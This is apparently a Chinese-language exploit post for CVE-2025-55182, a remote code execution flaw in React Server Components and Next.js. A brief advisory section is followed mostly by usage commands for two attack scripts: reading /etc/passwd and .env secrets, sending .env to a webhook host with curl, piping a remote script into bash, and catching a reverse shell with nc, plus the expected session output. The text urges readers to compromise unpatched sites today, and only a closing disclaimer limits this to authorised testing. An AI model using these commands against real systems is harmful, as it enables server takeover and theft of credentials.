CVE-2025-55182
✅ 这意味着攻击者只需一次精心构造的请求,就可能执行任意服务器端代码。
⚠️ 使用 React 服务器组件的系统,包括:
✅ React 服务器 DOM 包
✅ 集成 RSC 的框架,例如:
❌ 不受影响:
🔍 扫描传递性易受攻击的软件包
🧾 使用:
npm auditpnpm audityarn audit⚠️ 这些只能降低风险 — 它们并不能替代修补
✅ 使用 Next.js App Router 的全栈开发人员
✅ 托管 React SSR 应用的 DevOps 团队
✅ 负责监控以下内容的安全工程师:
🚨 如果你的应用使用了 React 服务器组件且未修补 — 它现在可能已被完全入侵。
CVE-2025-55182.py(基础 RCE)
# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py(即时反向 Shell)
# 1. Start listener (once)
nc -lvnp 4444
# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
就这么简单。
两个脚本,这 8 条命令 → 今天就能完全攻陷任何未修补的 Next.js 站点。
去拿下那些赏金吧。
以下是漏洞利用成功时你将实时看到的确切输出(100% 未修补目标,2025 年 12 月 3 日):
1. 当你运行常规 RCE 脚本(CVE-2025-55182.py)时
你输入:
./CVE-2025-55182.py https://target.com "whoami"
你会在屏幕上立即看到:
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ 那个 “node”(或命令返回的任何内容)就是受害服务器的实际输出。
如果你运行 id,你会看到完整的 uid/gid 行等信息。
2. 当你运行反向 Shell 脚本(CVE-2025-55182-revshell.py)时
你输入:
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
你会在监听终端上立即看到:
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ 以 node 用户身份获得完整的交互式 TTY Shell(几乎总是 Web 应用用户)。你已完全掌控该主机。
就这么简单。
如果你看到以上任何内容 → 漏洞利用 100% 成功。
如果你只得到 HTTP 403/404 或什么也没有 → 说明已修补或被 WAF 阻止。
开始狩猎吧。
免责声明
此 PoC 仅用于经授权的安全测试和教育用途。
请勿针对任何你不拥有或未经明确书面许可的系统运行它。
未经授权的使用属于违法行为,可能导致刑事起诉。
仅可在你的实验室、具有明确范围的漏洞赏金计划或已获得授权的目标上使用。
你对自己的行为承担 100% 的责任。